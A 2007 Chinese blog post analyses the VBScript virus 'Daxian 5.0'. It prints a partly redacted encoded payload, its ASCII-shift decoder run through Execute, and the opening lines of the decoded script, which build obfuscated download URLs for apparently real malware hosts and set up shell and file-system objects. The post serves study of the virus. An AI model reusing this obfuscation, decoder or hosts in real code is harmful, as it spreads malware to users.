【冰冻苔原】  
网聚无限美与忆

公告
日历
<2007年11月>
28293031123
45678910
11121314151617
18192021222324
2526272829301
2345678
统计
  • 随笔 - 70
  • 文章 - 11
  • 评论 - 99
  • 引用 - 0

导航

常用链接

留言簿(13)

随笔分类

随笔档案

文章分类

文章档案

相册

收藏夹

链接无限

搜索

  •  

积分与排名

  • 积分 - 64166
  • 排名 - 56

最新评论

阅读排行榜

 
由于本博旨在研究此病毒,不在传播,所以会隐去一些代码,见谅

以下是那个vbs脚本里的真实代码部分(经过转码):
1Da="ire=0.5gvyr=qnkvna&ire nobhg=raq /////shapgvba"
以上//////部分为隐去的代码

以下是那个vbs脚本里的代码部分(用来解码):
1Execute("For i=1 To Len(Da)"+vbCrLf+"Xian = Asc(Mid(Da,i,1))"+vbCrLf+"If Xian = 28 Then"+vbCrLf+"Xian = 13"+vbCrLf+"ElseIf Xian = 29 Then"+vbCrLf+"Xian = 10"+vbCrLf+"elseif Xian=18 Then"+vbCrLf+"Xian = 34"+vbCrLf+"elseif Xian>96 and Xian<110 then"+vbCrLf+"Xian=Xian+13"+vbCrLf+"elseif Xian>109 and Xian<123 then"+vbCrLf+"Xian=Xian-13"+vbCrLf+"elseif Xian>47 and Xian<53 then"+vbCrLf+"Xian=Xian+5"+vbCrLf+"elseif Xian>52 and Xian<58 then"+vbCrLf+"Xian=Xian-5"+vbCrLf+"End If"+vbCrLf+"DaXian = DaXian + chr(Xian)"+vbCrLf+"Next")
2Execute(DaXian)
从上面的代码,大家不难看出,这是通过字符的ASCII码来进行转码的,所以解起来比较容
易,有兴趣的博友可以自己写个程序解一下。

我解出来的代码如下:

 1ver="5.0"
 2tile="daxian"&ver 
 3about="daxianbiyeliunian 2007.8.7"
 4fromurl2=chr(104)&chr(116)&chr(116)&chr(112)&"://"&"u4."&chr(50)&chr(50)&chr(56)&"8.or"&chr(103)&"/u5."&chr(97)&"s"&chr(112)
 5fromurl=chr(104)&chr(116)&chr(116)&chr(112)&"://"&chr(104)&chr(103)&"z."&chr(100)&"in"&chr(103)&chr(104)&"ui123."&chr(99)&"n/u5."&chr(97)&"s"&chr(112)
 6on error resume next
 7dim wsh
 8dim WshShell
 9Set Wsh =CreateObject("WScript.Shell")
10set WshShell=Wscript.CreateObject("Wscript.Shell")
11Set FSO = CreateObject("Scripting.FileSystemObject")
12set dir = FSO.GetSpecialFolder(1)
13set win = FSO.GetSpecialFolder(0)
14Set dc = FSO.Drives
15ouwnname=Wscript.ScriptName
16exemulu=FSO.GetSpecialFolder(2)&"\"
17mulu=left(Wscript.ScriptFullName,len(Wscript.ScriptFullName)-len(Wscript.ScriptName))
18if mulu=dir&"\" then sys=true
19For Each d In dc
20if mulu=d&"\" then opendisk=WshShell.Run("explorer "&d,3,false)
21Next
22'以下省略代码若干
23   .......................

总之代码所做的无非是做添加病毒文件和修改注册表一类的事情。

具体到VB脚本的分析偶就不再写了,以此和大家共同研究探讨。

(Daxian 5.0研究志 完)

posted on 2007-11-09 13:42 【冰冻苔原】 阅读(337) 评论(1)  编辑  收藏 所属分类: 编程&&电脑技术随笔
评论:
 
Copyright © 【冰冻苔原】 Powered by: 博客园 模板提供:沪江博客